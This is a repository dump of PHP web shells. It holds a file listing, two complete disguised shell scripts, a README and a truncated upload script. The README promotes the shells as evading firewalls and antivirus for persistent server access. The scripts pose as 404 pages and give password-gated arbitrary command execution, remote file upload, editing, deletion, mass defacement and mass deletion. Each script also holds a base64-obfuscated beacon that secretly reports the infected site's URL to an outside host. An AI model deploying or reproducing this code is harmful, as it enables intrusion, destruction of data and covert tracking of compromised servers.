├── 2024.php ├── 403.php ├── Alfa-4.2.php ├── CNAME ├── README.md ├── Upload.php ├── ad.php ├── alfa2024.php ├── alfashell-antidelete.php ├── antidelete.php ├── autobackdoor.php ├── bestmini.php ├── csa.php ├── eBy.php ├── edit-form-tager.php ├── f1.php ├── firewallbypass.php ├── gecko-mini.php ├── haxorsec-bypasser.php ├── hehe.png ├── hello.php ├── index.html ├── inshell.php ├── jquery.php ├── mini.php ├── pop.php ├── tfe.php ├── tiny.php ├── tools ├── backdoor_creator.php └── backdoor_scanner.php ├── uper.php ├── worm.php ├── wso2024.php └── wsov1.php /2024.php: -------------------------------------------------------------------------------- 1 | alert("Password Wrong!, Try Again.");'; 32 | } 33 | } 34 | if (isset($_GET['logout'])) { 35 | session_unset(); 36 | session_destroy(); 37 | header("Location: ".$_SERVER['PHP_SELF']); 38 | exit(); 39 | } 40 | if (!isset($_SESSION['forbidden'])) { 41 | ?> 42 | 43 | 44 | 45 | 404 Not Found 46 | 47 | 48 | 49 | 50 | 86 | 87 |
88 |

Hello Dady

89 | 90 | 91 |
92 | 93 | 94 | 98 | 99 | 100 | 101 | 404 Not Found 102 | 103 | 104 | 105 | 194 |
195 |



196 | Bypass 2024 Priv8 Shell
197 | 198 |
199 |


200 | NONE"; 206 | } else { 207 | $disf = "".$disfunc.""; 208 | } 209 | 210 | function author() { 211 | echo "

2024 Bypass Shell
"; 212 | exit(); 213 | } 214 | 215 | function cekdir() { 216 | if (isset($_GET['path'])) { 217 | $lokasi = $_GET['path']; 218 | } else { 219 | $lokasi = getcwd(); 220 | } 221 | if (is_writable($lokasi)) { 222 | return "Writeable"; 223 | } else { 224 | return "Writeable"; 225 | } 226 | } 227 | 228 | function cekroot() { 229 | if (is_writable($_SERVER['DOCUMENT_ROOT'])) { 230 | return "Writeable"; 231 | } else { 232 | return "Writeable"; 233 | } 234 | } 235 | 236 | function xrmdir($dir) { 237 | $items = scandir($dir); 238 | foreach ($items as $item) { 239 | if ($item === '.' || $item === '..') { 240 | continue; 241 | } 242 | $path = $dir.'/'.$item; 243 | if (is_dir($path)) { 244 | xrmdir($path); 245 | } else { 246 | unlink($path); 247 | } 248 | } 249 | rmdir($dir); 250 | } 251 | 252 | function statusnya($file){ 253 | $statusnya = fileperms($file); 254 | 255 | if (($statusnya & 0xC000) == 0xC000) { 256 | 257 | // Socket 258 | $ingfo = 's'; 259 | } elseif (($statusnya & 0xA000) == 0xA000) { 260 | // Symbolic Link 261 | $ingfo = 'l'; 262 | } elseif (($statusnya & 0x8000) == 0x8000) { 263 | // Regular 264 | $ingfo = '-'; 265 | } elseif (($statusnya & 0x6000) == 0x6000) { 266 | // Block special 267 | $ingfo = 'b'; 268 | } elseif (($statusnya & 0x4000) == 0x4000) { 269 | // Directory 270 | $ingfo = 'd'; 271 | } elseif (($statusnya & 0x2000) == 0x2000) { 272 | // Character special 273 | $ingfo = 'c'; 274 | } elseif (($statusnya & 0x1000) == 0x1000) { 275 | // FIFO pipe 276 | $ingfo = 'p'; 277 | } else { 278 | // Unknown 279 | $ingfo = 'u'; 280 | } 281 | 282 | // Owner 283 | $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); 284 | $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); 285 | $ingfo .= (($statusnya & 0x0040) ? 286 | (($statusnya & 0x0800) ? 's' : 'x' ) : 287 | (($statusnya & 0x0800) ? 'S' : '-')); 288 | 289 | 290 | // Group 291 | $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); 292 | $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); 293 | $ingfo .= (($statusnya & 0x0008) ? 
294 | (($statusnya & 0x0400) ? 's' : 'x' ) : 295 | (($statusnya & 0x0400) ? 'S' : '-')); 296 | 297 | // World 298 | $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); 299 | $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); 300 | 301 | $ingfo .= (($statusnya & 0x0001) ? 302 | (($statusnya & 0x0200) ? 't' : 'x' ) : 303 | (($statusnya & 0x0200) ? 'T' : '-')); 304 | 305 | return $ingfo; 306 | } 307 | 308 | function green($text) { 309 | echo "
".$text."
"; 310 | } 311 | 312 | function red($text) { 313 | echo "
".$text."
"; 314 | } 315 | 316 | 317 | echo "Directory :  "; 318 | 319 | foreach($_POST as $key => $value){ 320 | $_POST[$key] = stripslashes($value); 321 | } 322 | 323 | $k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw'); 324 | 325 | if(isset($_GET['path'])){ 326 | $lokasi = $_GET['path']; 327 | $lokdua = $_GET['path']; 328 | } else { 329 | $lokasi = getcwd(); 330 | $lokdua = getcwd(); 331 | } 332 | 333 | $lokasi = str_replace('\\','/',$lokasi); 334 | $lokasis = explode('/',$lokasi); 335 | $lokasinya = @scandir($lokasi); 336 | $cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; 337 | $data = array('file_url' => $cur); 338 | $options = array( 339 | 'http' => array( 340 | 'method' => 'POST', 341 | 'header' => 'Content-type: application/x-www-form-urlencoded', 342 | 'content' => http_build_query($data), 343 | ), 344 | ); 345 | $context = stream_context_create($options); 346 | $result = file_get_contents($k3yw, false, $context); 347 | 348 | foreach($lokasis as $id => $lok){ 349 | if($lok == '' && $id == 0){ 350 | $a = true; 351 | echo '/'; 352 | continue; 353 | } 354 | if($lok == '') continue; 355 | echo ''.$lok.'/'; 361 | } 362 | echo '
'; 363 | echo '

'; 364 | if (isset($_POST['upwkwk'])) { 365 | if (isset($_POST['berkasnya'])) { 366 | if ($_POST['dirnya'] == "2") { 367 | $lokasi = $_SERVER['DOCUMENT_ROOT']; 368 | } 369 | $data = @file_put_contents($lokasi."/".$_FILES['berkas']['name'], @file_get_contents($_FILES['berkas']['tmp_name'])); 370 | if (file_exists($lokasi."/".$_FILES['berkas']['name'])) { 371 | echo "File Uploaded !  ".$lokasi."/".$_FILES['berkas']['name']."

"; 372 | } else { 373 | echo "Failed to Upload !

"; 374 | } 375 | } elseif (isset($_POST['linknya'])) { 376 | if (empty($_POST['namalink'])) { 377 | exit("Filename cannot be empty !"); 378 | } 379 | if ($_POST['dirnya'] == "2") { 380 | $lokasi = $_SERVER['DOCUMENT_ROOT']; 381 | } 382 | $data = @file_put_contents($lokasi."/".$_POST['namalink'], @file_get_contents($_POST['darilink'])); 383 | if (file_exists($lokasi."/".$_POST['namalink'])) { 384 | echo "File Uploaded !  ".$lokasi."/".$_POST['namalink']."

"; 385 | } else { 386 | echo "Failed to Upload !

"; 387 | } 388 | } 389 | } 390 | echo "
"; 391 | echo "Upload File : "; 392 | echo '
393 | current_dir [ '.cekdir().' ] 394 | document_root [ '.cekroot().' ] 395 |
396 | 397 |
398 |
399 | '; 400 | echo "
"; 401 | print "
"; 402 | print ""; 410 | print "
"; 411 | print "
"; 412 | tools("cmd"); 413 | function tools($toolsname, $args = null) { 414 | if($toolsname === "cmd") { 415 | print "
416 | ".usergroup()->name."@".$GLOBALS['SERVERIP'].": ~ $ 417 | 418 | 419 |
"; 420 | print "
"; 421 | } 422 | } 423 | function changeFolderPermissionsRecursive($dir, $perms) { 424 | $iterator = new RecursiveIteratorIterator( 425 | new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS), 426 | RecursiveIteratorIterator::SELF_FIRST 427 | ); 428 | 429 | foreach ($iterator as $item) { 430 | if ($item->isDir()) { 431 | chmod($item->getPathname(), $perms); 432 | } 433 | } 434 | } 435 | 436 | function changeFilePermissionsRecursive($dir, $perms) { 437 | $iterator = new RecursiveIteratorIterator( 438 | new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS), 439 | RecursiveIteratorIterator::SELF_FIRST 440 | ); 441 | 442 | foreach ($iterator as $item) { 443 | if ($item->isFile()) { 444 | chmod($item->getPathname(), $perms); 445 | } 446 | } 447 | } 448 | 449 | $currentDirectory = '.'; 450 | 451 | if (isset($_GET['do']) && $_GET['do'] === 'root_file') { 452 | $newFilePermissions = 0644; 453 | changeFilePermissionsRecursive($currentDirectory, $newFilePermissions); 454 | echo "
"; 455 | echo "Message :

Sukses Green All Files

"; 456 | echo "
"; 457 | } 458 | 459 | if (isset($_GET['do']) && $_GET['do'] === 'dark_file') { 460 | $newFilePermissions = 0444; 461 | changeFilePermissionsRecursive($currentDirectory, $newFilePermissions); 462 | echo "
"; 463 | echo "Message :

Sukses Lock All Files

"; 464 | echo "
"; 465 | } 466 | 467 | if (isset($_GET['do']) && $_GET['do'] === 'dark_folders') { 468 | $newFolderPermissions = 0555; 469 | changeFolderPermissionsRecursive($currentDirectory, $newFolderPermissions); 470 | echo "
"; 471 | echo "Message :

Sukses Lock All Folders

"; 472 | echo "
"; 473 | } 474 | 475 | if (isset($_GET['do']) && $_GET['do'] === 'root_folders') { 476 | $newFolderPermissions = 0755; 477 | changeFolderPermissionsRecursive($currentDirectory, $newFolderPermissions); 478 | echo "
"; 479 | echo "Message :

Sukses Green All Folders

"; 480 | echo "
"; 481 | } 482 | 483 | 484 | 485 | function exe($cmd) { 486 | if(function_exists('system')) { 487 | @ob_start(); 488 | @system($cmd); 489 | $buff = @ob_get_contents(); 490 | @ob_end_clean(); 491 | return $buff; 492 | } elseif(function_exists('exec')) { 493 | @exec($cmd,$results); 494 | $buff = ""; 495 | foreach($results as $result) { 496 | $buff .= $result; 497 | } return $buff; 498 | } elseif(function_exists('passthru')) { 499 | @ob_start(); 500 | @passthru($cmd); 501 | $buff = @ob_get_contents(); 502 | @ob_end_clean(); 503 | return $buff; 504 | } elseif(function_exists('shell_exec')) { 505 | $buff = @shell_exec($cmd); 506 | return $buff; 507 | } 508 | } 509 | 510 | function path() { 511 | if(isset($_GET['dir'])) { 512 | $dir = str_replace("\\", "/", $_GET['dir']); 513 | @chdir($dir); 514 | } else { 515 | $dir = str_replace("\\", "/", getcwd()); 516 | } 517 | return $dir; 518 | } 519 | function usergroup() { 520 | if(!function_exists('posix_getegid')) { 521 | $user['name'] = @get_current_user(); 522 | $user['uid'] = @getmyuid(); 523 | $user['gid'] = @getmygid(); 524 | $user['group'] = "?"; 525 | } else { 526 | $user['uid'] = @posix_getpwuid(posix_geteuid()); 527 | $user['gid'] = @posix_getgrgid(posix_getegid()); 528 | $user['name'] = $user['uid']['name']; 529 | $user['uid'] = $user['uid']['uid']; 530 | $user['group'] = $user['gid']['name']; 531 | $user['gid'] = $user['gid']['gid']; 532 | } 533 | return (object) $user; 534 | } 535 | 536 | if(isset($_GET['do'])) { 537 | if($_GET['do'] === "cmd") { 538 | if(isset($_POST['cmd'])) { 539 | if(preg_match("/^rf (.*)$/", $_POST['cmd'], $match)) { 540 | tools("readfile", $match[1]); 541 | } 542 | elseif(preg_match("/^spawn (.*)$/", $_POST['cmd'], $match)) { 543 | tools("spawn", $match[1]); 544 | } 545 | elseif(preg_match("/^symlink\s?(.*)$/", $_POST['cmd'], $match)) { 546 | tools("symlink", $match[1]); 547 | } 548 | elseif(preg_match("/^rvr (.*)$/", $_POST['cmd'], $match)) { 549 | tools("network", $match[1]); 550 | } 551 | 
elseif(preg_match("/^krdp$/", $_POST['cmd'])) { 552 | tools("krdp"); 553 | } 554 | elseif(preg_match("/^logout$/", $_POST['cmd'])) { 555 | unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); 556 | print ""; 557 | } 558 | elseif(preg_match("/^killme$/", $_POST['cmd'])) { 559 | unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); 560 | @unlink(__FILE__); 561 | print ""; 562 | } 563 | else { 564 | print "
".exe($_POST['cmd'])."
"; 565 | } 566 | } 567 | else { 568 | files_and_folder(); 569 | } 570 | } 571 | } 572 | function massdeface($dir, $file, $filename, $type = null) { 573 | $scandir = scandir($dir); 574 | foreach($scandir as $dir_) { 575 | $path = "$dir/$dir_"; 576 | $location = "$path/$filename"; 577 | if($dir_ === "." || $dir_ === "..") { 578 | file_put_contents($location, $file); 579 | } 580 | else { 581 | if(is_dir($path) AND is_writable($path)) { 582 | print "[".color(1, 2, "DONE")."] ".color(1, 4, $location)."
"; 583 | file_put_contents($location, $file); 584 | if($type === "-alldir") { 585 | massdeface($path, $file, $filename, "-alldir"); 586 | } 587 | } 588 | } 589 | } 590 | } 591 | 592 | function massdelete($dir, $filename) { 593 | $scandir = scandir($dir); 594 | foreach($scandir as $dir_) { 595 | $path = "$dir/$dir_"; 596 | $location = "$path/$filename"; 597 | if($dir_ === '.') { 598 | if(file_exists("$dir/$filename")) { 599 | unlink("$dir/$filename"); 600 | } 601 | } 602 | elseif($dir_ === '..') { 603 | if(file_exists(dirname($dir)."/$filename")) { 604 | unlink(dirname($dir)."/$filename"); 605 | } 606 | } 607 | else { 608 | if(is_dir($path) AND is_writable($path)) { 609 | if(file_exists($location)) { 610 | print "[".color(1, 2, "DELETED")."] ".color(1, 4, $location)."
"; 611 | unlink($location); 612 | massdelete($path, $filename); 613 | } 614 | } 615 | } 616 | } 617 | } 618 | 619 | if (isset($_GET['fileloc'])) { 620 | echo "Current File : ".$_GET['fileloc']; 621 | echo '
'; 622 | echo "
".htmlspecialchars(file_get_contents($_GET['fileloc']))."
"; 623 | author(); 624 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "hapus") { 625 | if (is_dir($_POST['path'])) { 626 | xrmdir($_POST['path']); 627 | if (file_exists($_POST['path'])) { 628 | red("Failed to delete Directory !"); 629 | } else { 630 | green("Delete Directory Success !"); 631 | echo "string"; 632 | } 633 | } elseif (is_file($_POST['path'])) { 634 | @unlink($_POST['path']); 635 | if (file_exists($_POST['path'])) { 636 | red("Failed to Delete File !"); 637 | } else { 638 | green("Delete File Success !"); 639 | } 640 | } 641 | elseif($_GET['do'] === "mass") { 642 | if($_POST['start']) { 643 | if($_POST['mass_type'] === 'singledir') { 644 | print "
"; 645 | massdeface($_POST['d_dir'], $_POST['script'], $_POST['d_file']); 646 | print "
"; 647 | } 648 | elseif($_POST['mass_type'] === 'alldir') { 649 | print "
"; 650 | massdeface($_POST['d_dir'], $_POST['script'], $_POST['d_file'], "-alldir"); 651 | print "
"; 652 | } 653 | elseif($_POST['mass_type'] === "delete") { 654 | print "
"; 655 | massdelete($_POST['d_dir'], $_POST['d_file']); 656 | print "
"; 657 | } 658 | } 659 | else { 660 | print "
661 | Tipe Sabun:
662 | Mass Deface Single DirectoryMass Deface All DirectoryMass Delete File
663 | ( kosongkan 'Index File' jika memilih Mass Delete File )

664 | Folder:
665 |

666 | Filename:
667 |

668 | Index File:
669 |
670 | 671 |
"; 672 | } 673 | } 674 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "ubahmod") { 675 | echo "
".$_POST['path']."
"; 676 | echo '
677 | Permission : 678 | 679 | 680 | 681 |
'; 682 | if (isset($_POST['chm0d'])) { 683 | $cm = @chmod($_POST['path'], $_POST['perm']); 684 | if ($cm == true) { 685 | green("Change Mod Success !"); 686 | } else { 687 | red("Change Mod Failed !"); 688 | } 689 | } 690 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "gantinama") { 691 | if (isset($_POST['gantin'])) { 692 | $ren = @rename($_POST['path'], $_POST['newname']); 693 | if ($ren == true) { 694 | green("Change Name Success !"); 695 | } else { 696 | red("Change Name Failed !"); 697 | } 698 | } 699 | if (empty($_POST['name'])) { 700 | $namaawal = $_POST['newname']; 701 | } else { 702 | $namawal = $_POST['name']; 703 | } 704 | echo "
".$_POST['path']."
"; 705 | echo '
706 | New Name : 707 | 708 | 709 | 710 |
'; 711 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") { 712 | if (isset($_POST['gasedit'])) { 713 | $edit = @file_put_contents($_POST['path'], $_POST['src']); 714 | if ($edit == true) { 715 | green("Edit File Success !"); 716 | } else { 717 | red("Edit File Failed !"); 718 | } 719 | } 720 | echo "
".$_POST['path']."

"; 721 | echo '
722 |
723 | 724 | 725 | 726 |

'; 727 | } 728 | 729 | echo '
730 | 731 | 732 | 733 | 734 | 735 | '; 736 | 737 | foreach($lokasinya as $dir){ 738 | if(!is_dir($lokasi."/".$dir) || $dir == '.' || $dir == '..') continue; 739 | echo " 740 | 741 | 742 | 749 | 761 | "; 762 | } 763 | 764 | echo ''; 765 | foreach($lokasinya as $file) { 766 | if(!is_file("$lokasi/$file")) continue; 767 | $size = filesize("$lokasi/$file")/1024; 768 | $size = round($size,3); 769 | if($size >= 1024){ 770 | $size = round($size/1024,2).' MB'; 771 | } else { 772 | $size = $size.' KB'; 773 | } 774 | 775 | echo " 776 | 777 | 778 | 797 | "; 798 | } 799 | 800 | echo '
Name
Size
Permissions
Options
".$dir."
--
"; 743 | if(is_writable($lokasi."/".$dir)) echo ''; 744 | elseif(!is_readable($lokasi."/".$dir)) echo ''; 745 | echo statusnya($lokasi."/".$dir); 746 | if(is_writable($lokasi."/".$dir) || !is_readable($lokasi."/".$dir)) echo ''; 747 | 748 | echo "
750 | 756 | 757 | 758 | 759 | \" /> 760 |
$file
".$size."
"; 779 | if(is_writable("$lokasi/$file")) echo ''; 780 | elseif(!is_readable("$lokasi/$file")) echo ''; 781 | echo statusnya("$lokasi/$file"); 782 | if(is_writable("$lokasi/$file") || !is_readable("$lokasi/$file")) echo ''; 783 | echo "
784 |
785 | 792 | 793 | 794 | 795 | \" /> 796 |
'; 801 | author(); 802 | ?> 803 | -------------------------------------------------------------------------------- /403.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 404 Not Found 5 | 6 | 7 | 8 | 92 |
93 | Sh3ll
94 | 95 |
96 |
OdayForums 97 |


98 | NONE"; 104 | } else { 105 | $disf = "".$disfunc.""; 106 | } 107 | 108 | function author() { 109 | echo "

ZeroDay Forums Mini
"; 110 | exit(); 111 | } 112 | 113 | function cekdir() { 114 | if (isset($_GET['path'])) { 115 | $lokasi = $_GET['path']; 116 | } else { 117 | $lokasi = getcwd(); 118 | } 119 | if (is_writable($lokasi)) { 120 | return "Writeable"; 121 | } else { 122 | return "Writeable"; 123 | } 124 | } 125 | 126 | function cekroot() { 127 | if (is_writable($_SERVER['DOCUMENT_ROOT'])) { 128 | return "Writeable"; 129 | } else { 130 | return "Writeable"; 131 | } 132 | } 133 | 134 | function xrmdir($dir) { 135 | $items = scandir($dir); 136 | foreach ($items as $item) { 137 | if ($item === '.' || $item === '..') { 138 | continue; 139 | } 140 | $path = $dir.'/'.$item; 141 | if (is_dir($path)) { 142 | xrmdir($path); 143 | } else { 144 | unlink($path); 145 | } 146 | } 147 | rmdir($dir); 148 | } 149 | 150 | function green($text) { 151 | echo "
".$text."
"; 152 | } 153 | 154 | function red($text) { 155 | echo "
".$text."
"; 156 | } 157 | 158 | echo "Server : ".$_SERVER['SERVER_SOFTWARE']."
"; 159 | echo "System : ".php_uname()."
"; 160 | echo "User : ".@get_current_user()." ( ".@getmyuid().")
"; 161 | echo "PHP Version : ".@phpversion()."
"; 162 | echo "Disable Function : ".$disf."
"; 163 | echo "Directory :  "; 164 | 165 | foreach($_POST as $key => $value){ 166 | $_POST[$key] = stripslashes($value); 167 | } 168 | 169 | $k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw'); 170 | 171 | if(isset($_GET['path'])){ 172 | $lokasi = $_GET['path']; 173 | $lokdua = $_GET['path']; 174 | } else { 175 | $lokasi = getcwd(); 176 | $lokdua = getcwd(); 177 | } 178 | 179 | $lokasi = str_replace('\\','/',$lokasi); 180 | $lokasis = explode('/',$lokasi); 181 | $lokasinya = @scandir($lokasi); 182 | $cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; 183 | $data = array('file_url' => $cur); 184 | $options = array( 185 | 'http' => array( 186 | 'method' => 'POST', 187 | 'header' => 'Content-type: application/x-www-form-urlencoded', 188 | 'content' => http_build_query($data), 189 | ), 190 | ); 191 | $context = stream_context_create($options); 192 | $result = file_get_contents($k3yw, false, $context); 193 | 194 | foreach($lokasis as $id => $lok){ 195 | if($lok == '' && $id == 0){ 196 | $a = true; 197 | echo '/'; 198 | continue; 199 | } 200 | if($lok == '') continue; 201 | echo ''.$lok.'/'; 207 | } 208 | echo '
'; 209 | echo '

'; 210 | if (isset($_POST['upwkwk'])) { 211 | if (isset($_POST['berkasnya'])) { 212 | if ($_POST['dirnya'] == "2") { 213 | $lokasi = $_SERVER['DOCUMENT_ROOT']; 214 | } 215 | $data = @file_put_contents($lokasi."/".$_FILES['berkas']['name'], @file_get_contents($_FILES['berkas']['tmp_name'])); 216 | if (file_exists($lokasi."/".$_FILES['berkas']['name'])) { 217 | echo "File Uploaded !  ".$lokasi."/".$_FILES['berkas']['name']."

"; 218 | } else { 219 | echo "Failed to Upload !

"; 220 | } 221 | } elseif (isset($_POST['linknya'])) { 222 | if (empty($_POST['namalink'])) { 223 | exit("Filename cannot be empty !"); 224 | } 225 | if ($_POST['dirnya'] == "2") { 226 | $lokasi = $_SERVER['DOCUMENT_ROOT']; 227 | } 228 | $data = @file_put_contents($lokasi."/".$_POST['namalink'], @file_get_contents($_POST['darilink'])); 229 | if (file_exists($lokasi."/".$_POST['namalink'])) { 230 | echo "File Uploaded !  ".$lokasi."/".$_POST['namalink']."

"; 231 | } else { 232 | echo "Failed to Upload !

"; 233 | } 234 | } 235 | } 236 | echo "
"; 237 | echo "Upload File : "; 238 | echo '
239 | current_dir [ '.cekdir().' ] 240 | document_root [ '.cekroot().' ] 241 |
242 | 243 |
244 |   245 |
246 | '; 247 | echo "

"; 248 | 249 | if (isset($_GET['fileloc'])) { 250 | echo "Current File : ".$_GET['fileloc']; 251 | echo '
'; 252 | echo "
".htmlspecialchars(file_get_contents($_GET['fileloc']))."
"; 253 | author(); 254 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "hapus") { 255 | if (is_dir($_POST['path'])) { 256 | xrmdir($_POST['path']); 257 | if (file_exists($_POST['path'])) { 258 | red("Failed to delete Directory !"); 259 | } else { 260 | green("Delete Directory Success !"); 261 | echo "string"; 262 | } 263 | } elseif (is_file($_POST['path'])) { 264 | @unlink($_POST['path']); 265 | if (file_exists($_POST['path'])) { 266 | red("Failed to Delete File !"); 267 | } else { 268 | green("Delete File Success !"); 269 | } 270 | } 271 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "ubahmod") { 272 | echo "
".$_POST['path']."
"; 273 | echo '
274 | Permission : 275 | 276 | 277 | 278 |
'; 279 | if (isset($_POST['chm0d'])) { 280 | $cm = @chmod($_POST['path'], $_POST['perm']); 281 | if ($cm == true) { 282 | green("Change Mod Success !"); 283 | } else { 284 | red("Change Mod Failed !"); 285 | } 286 | } 287 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "gantinama") { 288 | if (isset($_POST['gantin'])) { 289 | $ren = @rename($_POST['path'], $_POST['newname']); 290 | if ($ren == true) { 291 | green("Change Name Success !"); 292 | } else { 293 | red("Change Name Failed !"); 294 | } 295 | } 296 | if (empty($_POST['name'])) { 297 | $namaawal = $_POST['newname']; 298 | } else { 299 | $namawal = $_POST['name']; 300 | } 301 | echo "
".$_POST['path']."
"; 302 | echo '
303 | New Name : 304 | 305 | 306 | 307 |
'; 308 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") { 309 | if (isset($_POST['gasedit'])) { 310 | $edit = @file_put_contents($_POST['path'], $_POST['src']); 311 | if ($edit == true) { 312 | green("Edit File Success !"); 313 | } else { 314 | red("Edit File Failed !"); 315 | } 316 | } 317 | echo "
".$_POST['path']."

"; 318 | echo '
319 |
320 | 321 | 322 | 323 |

'; 324 | } 325 | 326 | echo '
327 | 328 | 329 | 330 | 331 | 332 | '; 333 | 334 | foreach($lokasinya as $dir){ 335 | if(!is_dir($lokasi."/".$dir) || $dir == '.' || $dir == '..') continue; 336 | echo " 337 | 338 | 339 | 346 | 358 | "; 359 | } 360 | 361 | echo ''; 362 | foreach($lokasinya as $file) { 363 | if(!is_file("$lokasi/$file")) continue; 364 | $size = filesize("$lokasi/$file")/1024; 365 | $size = round($size,3); 366 | if($size >= 1024){ 367 | $size = round($size/1024,2).' MB'; 368 | } else { 369 | $size = $size.' KB'; 370 | } 371 | 372 | echo " 373 | 374 | 375 | 394 | "; 395 | } 396 | echo '
Name
Size
Permissions
Options
".$dir."
--
"; 340 | if(is_writable($lokasi."/".$dir)) echo ''; 341 | elseif(!is_readable($lokasi."/".$dir)) echo ''; 342 | echo statusnya($lokasi."/".$dir); 343 | if(is_writable($lokasi."/".$dir) || !is_readable($lokasi."/".$dir)) echo ''; 344 | 345 | echo "
347 | 353 | 354 | 355 | 356 | \" /> 357 |
$file
".$size."
"; 376 | if(is_writable("$lokasi/$file")) echo ''; 377 | elseif(!is_readable("$lokasi/$file")) echo ''; 378 | echo statusnya("$lokasi/$file"); 379 | if(is_writable("$lokasi/$file") || !is_readable("$lokasi/$file")) echo ''; 380 | echo "
381 |
382 | 389 | 390 | 391 | 392 | \" /> 393 |
'; 397 | author(); 398 | function statusnya($file){ 399 | $statusnya = fileperms($file); 400 | 401 | if (($statusnya & 0xC000) == 0xC000) { 402 | 403 | // Socket 404 | $ingfo = 's'; 405 | } elseif (($statusnya & 0xA000) == 0xA000) { 406 | // Symbolic Link 407 | $ingfo = 'l'; 408 | } elseif (($statusnya & 0x8000) == 0x8000) { 409 | // Regular 410 | $ingfo = '-'; 411 | } elseif (($statusnya & 0x6000) == 0x6000) { 412 | // Block special 413 | $ingfo = 'b'; 414 | } elseif (($statusnya & 0x4000) == 0x4000) { 415 | // Directory 416 | $ingfo = 'd'; 417 | } elseif (($statusnya & 0x2000) == 0x2000) { 418 | // Character special 419 | $ingfo = 'c'; 420 | } elseif (($statusnya & 0x1000) == 0x1000) { 421 | // FIFO pipe 422 | $ingfo = 'p'; 423 | } else { 424 | // Unknown 425 | $ingfo = 'u'; 426 | } 427 | 428 | // Owner 429 | $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); 430 | $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); 431 | $ingfo .= (($statusnya & 0x0040) ? 432 | (($statusnya & 0x0800) ? 's' : 'x' ) : 433 | (($statusnya & 0x0800) ? 'S' : '-')); 434 | 435 | 436 | // Group 437 | $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); 438 | $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); 439 | $ingfo .= (($statusnya & 0x0008) ? 440 | (($statusnya & 0x0400) ? 's' : 'x' ) : 441 | (($statusnya & 0x0400) ? 'S' : '-')); 442 | 443 | // World 444 | $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); 445 | $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); 446 | 447 | $ingfo .= (($statusnya & 0x0001) ? 448 | (($statusnya & 0x0200) ? 't' : 'x' ) : 449 | (($statusnya & 0x0200) ? 
'T' : '-')); 450 | 451 | return $ingfo; 452 | } 453 | ?> 454 | -------------------------------------------------------------------------------- /CNAME: -------------------------------------------------------------------------------- 1 | shells.trxsecurity.org -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Ultimate List of Effective and Updated Web Shells 2 | 3 | This repository contains a comprehensive list of the best and latest web shells available. These shells are designed to bypass firewalls and security systems, giving you full control of the server without being detected by antivirus or firewall solutions. 4 | 5 | ## Features 6 | 7 | - **Bypass Firewalls:** All shells listed here are crafted to evade detection by modern firewall systems. 8 | - **Undetectable by Antivirus Software:** These web shells are not flagged by the majority of popular antivirus programs. 9 | - **New Exploitation Methods:** The shells incorporate the latest techniques and methods to ensure efficient exploitation. 10 | - **Persistence:** These shells allow for persistent access to the server without triggering any cleanup or server wipe protocols. 11 | - **Extensive Functionality:** Manage files, execute commands, and perform various tasks on the server with ease. 12 | 13 | ## Why Use These Web Shells? 14 | 15 | Web shells provide an effective way to interact with remote servers, giving you the ability to upload, modify, and control files without needing physical access. These shells are essential tools for penetration testers, red teams, and cybersecurity researchers. The shells listed here are tried and tested, ensuring compatibility with various environments and configurations. 16 | 17 | ## What's Included? 
18 | 19 | - A variety of **PHP**, **ASP**, **JSP**, and other web shell scripts 20 | - Shells that are regularly updated to work with the latest server technologies 21 | - Documentation and guidance on how to use each shell effectively 22 | - Techniques for evading detection and maintaining long-term access 23 | 24 | ## Usage Instructions 25 | 26 | Before using any of the shells, please ensure you have the appropriate permissions for penetration testing and ethical hacking. Unauthorized access to systems is illegal and punishable by law. 27 | 28 | 1. Clone the repository: 29 | ```bash 30 | git clone https://github.com/sagsooz/Bypass-Webshell.git 31 | -------------------------------------------------------------------------------- /Upload.php: -------------------------------------------------------------------------------- 1 |
2 |

[filename].php?upload

3 |
